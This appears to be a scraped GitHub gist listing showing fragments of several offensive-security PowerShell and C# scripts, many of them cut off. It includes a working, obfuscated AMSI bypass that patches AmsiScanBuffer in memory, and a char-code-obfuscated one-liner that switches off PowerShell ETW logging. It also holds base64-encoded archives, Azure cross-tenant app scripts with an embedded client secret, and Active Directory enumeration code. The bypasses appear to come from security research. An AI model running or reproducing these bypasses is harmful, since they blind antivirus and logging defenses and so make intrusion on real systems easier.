This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$teststring = "AMSI Test Sample: " + "7e72c3ce-861b-4339-8740-0ac1484c1386" | |
Invoke-Expression $teststring |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$data = @" | |
usi-ng Syst-em;usi-ng Syst-em.R-untime.Int-eropS-ervices;us-ing Syst-em.Thr-ead-ing;pub-lic c-lass Pr-ogram{- [D-llIm-port("ker-ne-l3-2")] pub-l-ic static e-x-tern IntPtr GetP-ro-cA-ddr-ess(IntPtr hMo-du-le, str-in-g proc-Na-me); [D-llIm-port("ke-rne-l3-2")] pub-l-ic static e-x-tern IntPtr Lo-ad-Li-brary(str-in-g na-me); [D-llIm-port("ke-rn-el32")] pub-l-ic static e-x-tern bo-ol V-irtualPr-ot-ect(IntPtr lpAd-dr-ess, U-In-t32 dw-S-ize, uint flN-ew-Pr-ot-ect, out uint lpflO-ld-Pr-ot-ect); pub-lic stat-ic void Ru-n() { Int-Ptr li-b = Lo-a-dLi-b-rary("a"+"m"+"si."+"d"+"l"+"l"); IntPt-r am-s-i = GetPr-o-cAddr-e-ss(lib, "A"+"m"+"s"+"iSc"+"anB"+"u-ff-e-r"); In-tPtr fi-nal = IntPtr.Ad-d(a-m-si, 0x9-5); uint old = 0; Vi-r-t-ua-lPr-o-t-ec-t(fi-nal, (UIn-t3-2)0x1, 0x4-0, out old); C-o-nso-l-e.Wr-i-teLi-n-e(old); byt-e[] pat-ch = new by-te[] { 0x75 }; M-a-rsh-a-l.Co-p-y(pat-ch, 0, final, 1); Vi-rt-ua-lPr-o-t-ec-t(fi-nal, (UIn-t32)0x1, o-ld, ou-t ol-d); }} | |
"@ | |
Add-Type $data.Replace('- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[System.Diagnostics.Eventing.EventProvider]."G`etField"(-join([char[]](109,95,101,110,97,98,108,101,100)),-join([char[]](78,111,110,80,117,98,108,105,99,44,73,110,115,116,97,110,99,101)))."S`etValue"([Ref].Assembly."G`etType"(-join([char[]](83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,84,114,97,99,105,110,103,46,80,83,69,116,119,76,111,103,80,114,111,118,105,100,101,114)))."G`etField"(-join([char[]](101,116,119,80,114,111,118,105,100,101,114)),-join([char[]](78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99)))."G`etValue"($null),0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
UEsDBBQAAAAIANVbIlDSrchvJ0wCAGihBwAYAAAATWFnbmV0UHJvY2Vzc0NhcHR1cmUuZXhl1Ft9YBzFdZ/bu9s73UmyTiff6fvWH5LXdydZ/pYMtmVjKMbf3w4G27J8NrIlrbwnYYyQLDDEYGwHKOTDUAJuSFJK0rSYQIFQU1ya0kBdmjrF2NSlhFBCG0ITmpJE6ntvZnfnPmTTlH+qoJ03v5n33m/ezLyZXTnLrr2HuRljHvgdGWHsGcZ/Wtmlf4bgtzj2bDE7UfDquGdcS18dt/aGjrTWYxo7zbYurb2tu9vo1balNLOvW+vo1hatWKN1GdtTjUVFgYnCxsorGVvqcrPCSPFmy+4FNp4FXSsZe9/L2JddhA37VMY0EDQokR3KCueNP1bJLvgI73rbB0XrHYyV0H9OaRf08wTYXYEC2L3lAZfTcLuP3VAD5UkfK4TiOuhXzf4XPxpjfqnqh/rVUr2xN3VTL5Se97x8LDhWhWX8ALy10Uyb7SATNxz7F6H8wJvRrxX+azRTnQZ0RK7ImWzd5svut5Bl/VzAuDLOTWFe9kjCy55/kzGMBMRUXbuOsSVn7Ohe8qdSB8dq/Fq9gbGA3ogPoKQqxhQQ45v1JiiUYRWcqumpIBvTED+rRPRmbIEmLza1oOIcRCL6ZVhE9ct5MZeD81DtKkUvht5GFB76fERqFb0Vy9fSC6AYglF40gtRwqWSvgIlN0qLUPKgdCVK4NMTbxzE7sZVqN84iArG73EZVYyruYxKxmIuo5pxDcqr3cMRGFOVsQFq7uGxKCOZjdg4S3Hrn8MBKYKim9RP44zrmsA8WG5TlH6YMw/2TAygxOvx+9xcaKx0J4PmzxnrSV8LCjcryi3UHywmwKJqWxxvkTAHN0H9MKzFqoYAekkMIUBo/OXBAtAu06+DSrLWbHGxntN+y4ZxPTzSmzE+2Iu6xisHA1jUKkNUDurjIfZmFyhSg7EFx4mD7S1A76L93jztsCxc8fvSOs7dVqGgDAVxTjZanYaKuDO9 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Copyright 2022 Almond (almond.consulting) | |
// | |
// Author: Yannick Méheut (ymeheut@almond.consulting) | |
// | |
// Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html | |
// | |
// Licensed under the Apache License, Version 2.0 (the "License"); | |
// you may not use this file except in compliance with the License. | |
// You may obtain a copy of the License at | |
// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404 | |
$myTenantId = "cdfdd915-c827-..." # The tenant registering the foreign application (Source: My Tenant) | |
$foreignTenantId = "d2a16643-37f9-4a19-..." # The tenant who is hosting the application (Source: Foreign Tenant) | |
$spPassword = "5YB8Q~iFPkt7WXYbqZkzi42BqpPgVJCWR-assd1" # The client secret from the app (Source: Foreign Tenant) | |
$appName = "foreignApp" # The app name (Source: Foreign Tenant) | |
# -------------- | |
#Step 0 (Foreign Tenant): Create an application in the portal | |
# -------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404 | |
# -------------- | |
# Find foreign service principals with application permissions | |
# -------------- | |
Write-Host "[*] Log in with a user that has at least the Application.Read.All right `n" -ForegroundColor Green | |
Connect-MgGraph -scopes "Application.Read.All" -NoWelcome | |
Write-Host "[*] Output the connection context `n" -ForegroundColor Green | |
$mgcontext = Get-MgContext |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Install and import the AzureAD module (if not already installed) | |
#Install-Module AzureAD -Force | |
#Import-Module AzureAD | |
# Connect to Azure AD | |
Connect-AzureAD | |
# Get all Azure AD groups | |
$AllGroups = Get-AzureADGroup -All $true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-EffectiveAccess { | |
[CmdletBinding()] | |
param( | |
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)] | |
[ValidatePattern('(?:(CN=([^,]*)),)?(?:((?:(?:CN|OU)=[^,]+,?)+),)?((?:DC=[^,]+,?)+)$')] | |
[alias('DistinguishedName')] | |
[string] $Identity, |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
begin-base64 644 - | |
Li9hZGVsZWctdjIuemlwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDY2NiAAMDAwMDAw | |
IAAwMDAwMDAgADAwMDEzMzMzMDAyIDE0NTc0MDc3NTU2IDAxMTcxMAAgMAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMDAwMDAgADAwMDAw | |
MCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQ |
NewerOlder